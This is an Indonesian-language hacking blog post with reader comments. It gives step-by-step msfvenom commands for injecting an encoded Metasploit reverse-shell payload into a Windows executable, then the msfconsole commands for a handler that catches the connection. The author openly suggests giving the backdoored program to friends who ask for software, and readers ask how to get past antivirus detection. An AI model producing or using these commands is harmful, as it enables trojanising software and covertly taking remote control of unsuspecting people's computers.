• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Backdoring Executable File Using Metasploit

February 17, 2016 by Jack Wilder 3 Comments

Sebenarnya ini trik lama sih, jadi kita bisa “ndompleng” backdoor di file aplikasi Windows. Jadi buat kalian yang punya banyak software, terus temennya sering minta minta, bisa nih di terapin. Hini. Yang diperlukan disini adalah metasploit, so buat kalian yang belum punya install dulu la yaa.

Buat kalian yang pakai Ubuntu dan belum ada metasploit nya bisa pake cara ini :

Cara Install Tools BackBox di Ubuntu Linux
Nah langsung saja ya ke tutorial.
pertama, kalian download dulu software ekstensi .exe atau kalau kalian punya juga pakai aja ndak perlu download lagi.
Spawn terminal di tempat file tadi berada.
Masukkan command 
sudo msfvenom -a x86 –platform windows -x aplikasi.exe -k -p windows/meterpreter/reverse_tcp LHOST=192.168.48.1 LPORT=666 -e x86/shikata_ga_nai -i 7 -f exe -o aplikasi-backdoor.exe
Nah berikut keterangannya :
– a adalah arsitektur yang digunakan. x86 berarti 32bit.
–platform adalah payload ini bakal digunain untuk OS apa. yep, kasus ini kita menyerang jendela.
-x adalah template dari aplikasi windows nya
-k perintah untuk mertahankan perilaku template(file.exe) dan menyuntikkan payload sebagai thread baru
-p adalah command untuk set jenis payloads
-lhost adalah ip kita
-lport adalah port yang akan kita gunakan
-e adalah untuk memilih encoder yang digunakan
-i adalah jumlah encode nya berapa kali
-f adalah format output
-o adalah output berupa aplikasi windows yang sudah di injeksi dengan payload.
Selanjutnya siapkan metasploit dalam mode ready.
sudo msfconsole
msf> use multi/handler
msf> set payload windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.48.1
msf> set LPORT 666
msf> exploit
Tunggu pengguna Windows “memakan” umpan kita.
Nah kalo kurang jelas simak video dibawah :

Sekian tutorial kali ini, bagi yang mau copas tolong kasih sumber link hidup ke post ini sebagai bentuk respect kalian terhadap pembuat konten.

Filed Under: Uncategorized Tagged With: Exploit, Metasploit

Reader Interactions

Comments

  1. Virg Yagi says

    February 18, 2016 at 12:32 pm

    error gk bisa di buka di windows 10 bang backdoor nya , kedeteksi virus ,, :3 solusi , ?

    Reply
  2. ./0px says

    October 21, 2017 at 5:07 am

    kalau muncul Error: The template to inject to appears to have license verification (warbird)

    test di kali linux 2.0

    giman cara fixnya om jack wilder (bener gak) 😀

    Reply
  3. jimbo says

    October 4, 2020 at 9:14 pm

    What is this for “shikata_ga_nai”?

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Cara Mendapatkan RDP Gratis Dengan Shell Windows

Arti dari Kata Deface yang Sering Dibahas oleh para Hacker

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

Cara Mudah Hack cPanel dengan Fitur Reset Password

Deface dengan Metode Timthumb Remote Code Execution

Command Injection Bypass Cheatsheet

Hack Targeted Website using Reverse IP

Mass Deface setelah Rooting Server

Zendesk Custom Domain or Subdomain Takeover

Heroku Custom Domain or Subdomain Takeover

LinuxSec / 9 queries in 0.09 seconds